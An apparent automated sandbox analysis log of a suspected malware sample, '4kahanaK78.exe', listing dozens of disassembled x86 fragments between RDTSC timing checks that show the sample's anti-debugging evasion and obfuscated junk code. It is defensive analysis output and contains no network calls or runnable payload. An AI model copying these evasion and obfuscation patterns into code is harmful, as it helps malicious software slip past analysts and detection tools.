Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999ED0 second address: 999F0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F0E05507509h 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f mov edx, dword ptr [ebp+122D35DAh] 0x00000015 push 00000000h 0x00000017 or dword ptr [ebp+122D1B64h], ebx 0x0000001d push E8D5CF71h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999F0C second address: 999F12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999F12 second address: 999F58 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E055074F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 172A310Fh 0x00000011 or dword ptr [ebp+122DB4F1h], ebx 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122DB4E1h], eax 0x0000001f push 00000000h 0x00000021 mov edi, 2B3B73E7h 0x00000026 push 00000003h 0x00000028 pushad 0x00000029 sbb eax, 2D67685Eh 0x0000002f jg 00007F0E055074F6h 0x00000035 popad 0x00000036 push FA8B753Ah 0x0000003b jbe 00007F0E05507504h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999F58 second address: 999F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E05506CE6h 0x0000000a popad 0x0000000b xor dword ptr [esp], 3A8B753Ah 0x00000012 adc di, 4836h 0x00000017 mov edi, edx 0x00000019 lea ebx, dword ptr [ebp+12450A48h] 0x0000001f mov di, si 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0E05506CEEh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999F8B second address: 999F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 981BC4 second address: 981C15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F0E05506CFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E05506CF9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9B940A second address: 9B940F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9B96A5 second address: 9B96CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CF6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F0E05506CE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9B96CA second address: 9B96D8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E055074F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9B9AF8 second address: 9B9B0A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F0E05506CECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9B9FD9 second address: 9BA013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0E055074F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E05507506h 0x00000011 jmp 00007F0E05507508h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BA152 second address: 9BA166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0E05506CE6h 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007F0E05506CE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BA166 second address: 9BA16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BA16C second address: 9BA176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BA176 second address: 9BA184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BA184 second address: 9BA19C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BA19C second address: 9BA1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BA1A2 second address: 9BA1C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEDh 0x00000007 pushad 0x00000008 jnl 00007F0E05506CE6h 0x0000000e jmp 00007F0E05506CEBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BA5BB second address: 9BA5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BA5BF second address: 9BA5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BAEA4 second address: 9BAEE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FCh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F0E0550751Eh 0x00000011 jmp 00007F0E05507504h 0x00000016 jmp 00007F0E05507504h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BAEE4 second address: 9BAF11 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E05506D03h 0x00000008 jg 00007F0E05506CECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BB36E second address: 9BB372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9BEDEE second address: 9BEDFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007F0E05506CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C2658 second address: 9C265E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C2CB6 second address: 9C2CBC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C2CBC second address: 9C2CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E05507505h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C3C6C second address: 9C3C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C3C70 second address: 9C3C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C3C74 second address: 9C3CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F0E05506CF3h 0x0000000d jmp 00007F0E05506CEDh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 jmp 00007F0E05506CEEh 0x0000001c jmp 00007F0E05506CF7h 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0E05506CF5h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C3CD3 second address: 9C3CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F0E05507504h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C3ED7 second address: 9C3EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E05506CEAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C6C80 second address: 9C6CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0E05507508h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C6CA3 second address: 9C6CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C6CA9 second address: 9C6CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d jne 00007F0E05507502h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C6CC8 second address: 9C6CCD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C6FCF second address: 9C6FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F0E055074F6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C6FDE second address: 9C6FF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C7445 second address: 9C744B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C744B second address: 9C748A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CF4h 0x00000009 jmp 00007F0E05506CF4h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 pop edi 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F0E05506CE6h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C748A second address: 9C748E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C75F3 second address: 9C75F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C75F9 second address: 9C75FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C75FF second address: 9C7607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9CAA24 second address: 9CAA2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9CAA2A second address: 9CAA4D instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E05506CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 6354CEF1h 0x00000013 movzx edi, dx 0x00000016 call 00007F0E05506CE9h 0x0000001b push esi 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9CAA4D second address: 9CAA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9CAA5C second address: 9CAA61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9CAE19 second address: 9CAE33 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E055074F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F0E055074FCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB09D second address: 9CB0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB0A7 second address: 9CB0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB4C2 second address: 9CB4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB586 second address: 9CB58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7D5 second address: 9CB7D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7D9 second address: 9CB7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7E3 second address: 9CB7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7E7 second address: 9CB7F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7F3 second address: 9CB7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBA89 second address: 9CBAB1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E055074FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D35A2h] 0x00000013 push eax 0x00000014 je 00007F0E05507508h 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007F0E055074F6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBAB1 second address: 9CBAB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBEFE second address: 9CBF03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBF03 second address: 9CBF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBF09 second address: 9CBF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D361Ah] 0x0000000e push 00000000h 0x00000010 or edi, 503F157Dh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F0E055074F8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 xchg eax, ebx 0x00000033 jmp 00007F0E05507501h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jnp 00007F0E055074F8h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBF5A second address: 9CBF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CC96D second address: 9CC993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507502h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0E055074FDh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CC7F5 second address: 9CC7FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CC7FB second address: 9CC801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CEFFF second address: 9CF009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0E05506CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CF009 second address: 9CF00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CF00D second address: 9CF055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E05506CF5h 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D362Ah] 0x00000015 push 00000000h 0x00000017 stc 0x00000018 push 00000000h 0x0000001a xor di, D20Ah 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 jnc 00007F0E05506CF3h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CF055 second address: 9CF059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CED8C second address: 9CED96 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CFAE0 second address: 9CFAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CFAE5 second address: 9CFAEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D0ED3 second address: 9D0ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D0ED8 second address: 9D0F3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E05506CE6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F0E05506CE8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F0E05506CE8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov esi, dword ptr [ebp+122D1B25h] 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D19F2h], edi 0x00000055 xchg eax, ebx 0x00000056 push ecx 0x00000057 push ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D0F3D second address: 9D0F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 js 00007F0E05507500h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D24D5 second address: 9D24DF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D2A45 second address: 9D2ABB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E055074F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0E055074F8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov ebx, eax 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F0E055074F8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov di, bx 0x00000046 push 00000000h 0x00000048 sbb bx, 6F35h 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F0E05507503h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D2ABB second address: 9D2AE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E05506CF1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D2AE2 second address: 9D2AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D4C0A second address: 9D4C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D4C0E second address: 9D4C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0E0550750Fh 0x0000000c jmp 00007F0E05507509h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D4C39 second address: 9D4C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
